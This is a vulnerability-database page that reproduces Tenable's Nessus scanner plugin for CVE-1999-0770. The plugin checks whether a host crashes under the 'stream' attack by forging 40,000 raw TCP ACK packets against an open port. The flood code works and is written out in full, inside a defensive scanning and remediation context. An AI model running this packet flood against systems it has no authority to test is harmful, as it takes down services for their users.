Lucene search
This script is Copyright (C) 2000-2019 Tenable Network Security, Inc.STREAM.NASLHistoryJan 21, 2000 - 12:00 a.m.
TCP/IP ACK Packet Saturation Remote DoS (stream.c)
2000-01-2100:00:00
This script is Copyright (C) 2000-2019 Tenable Network Security, Inc.
www.tenable.com
44
CVSS2
2.1
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:N/I:N/A:P
EPSS
0.001
Percentile
21.8%
It seems it was possible to make the remote server crash using the ‘stream’ (or ‘raped’) attack.
An attacker may use this flaw to shut down this server, thus preventing your network from working properly.
#
# (C) Tenable Network Security, Inc.
#
# Script audit and contributions from Carmichael Security
# Erik Anderson <[email protected]> (nb: domain no longer exists)
# Added links to the Bugtraq message archive
#
include("compat.inc");
if (description)
{
script_id(10271);
script_version("1.34");
script_cvs_date("Date: 2019/03/06 18:38:55");
script_cve_id("CVE-1999-0770");
script_bugtraq_id(549);
script_name(english:"TCP/IP ACK Packet Saturation Remote DoS (stream.c)");
script_summary(english:"Crashes the remote host using the 'stream' attack");
script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
script_set_attribute(attribute:"description", value:
"It seems it was possible to make the remote server crash using the
'stream' (or 'raped') attack.
An attacker may use this flaw to shut down this server, thus
preventing your network from working properly.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Jul/247");
script_set_attribute(attribute:"solution", value:
"Solution :
Contact your operating system vendor for a patch.
- If you use IP filter, then add these rules :
block in quick proto tcp from any to any head 100
pass in quick proto tcp from any to any flags S keep state group 100
pass in all");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"1999/07/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2000/01/21");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_FLOOD);
script_copyright(english:"This script is Copyright (C) 2000-2019 Tenable Network Security, Inc.");
script_family(english:"Denial of Service");
script_require_keys("Settings/ParanoidReport");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
if ( TARGET_IS_IPV6 ) exit(0);
addr = compat::this_host();
id = rand();
sport = rand();
seq = rand();
port = get_host_open_port();
if(!port)port = rand() % 65535;
start_denial();
for(i=0;i<40000;i=i+1)
{
id = id + 1;
sport = sport + 1;
seq = seq+1;
ip = forge_ip_packet( ip_v : 4,
ip_hl : 5,
ip_tos : 0x08,
ip_len : 20,
ip_id : id,
ip_p : IPPROTO_TCP,
ip_ttl : 255,
ip_off : 0,
ip_src : addr);
tcpip = forge_tcp_packet( ip : ip,
th_sport : sport,
th_dport : port,
th_flags : TH_ACK,
th_seq : seq,
th_ack : 0,
th_x2 : 0,
th_off : 5,
th_win : 2048,
th_urp : 0);
send_packet(tcpip, pcap_active:FALSE);
}
sleep(5);
alive = end_denial();
if(!alive) {
set_kb_item(name:"Host/dead", value:TRUE);
security_hole(0);
}
Related
cvelist
cvelist
CVE-1999-0770
2000-01-18 05:00:00
nvd
nvd
CVE-1999-0770
1999-07-29 04:00:00
cve
cve
CVE-1999-0770
2000-01-18 05:00:00
exploitdb
exploitdb
CVSS2
2.1
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:N/I:N/A:P
EPSS
0.001
Percentile
21.8%
Related for STREAM.NASL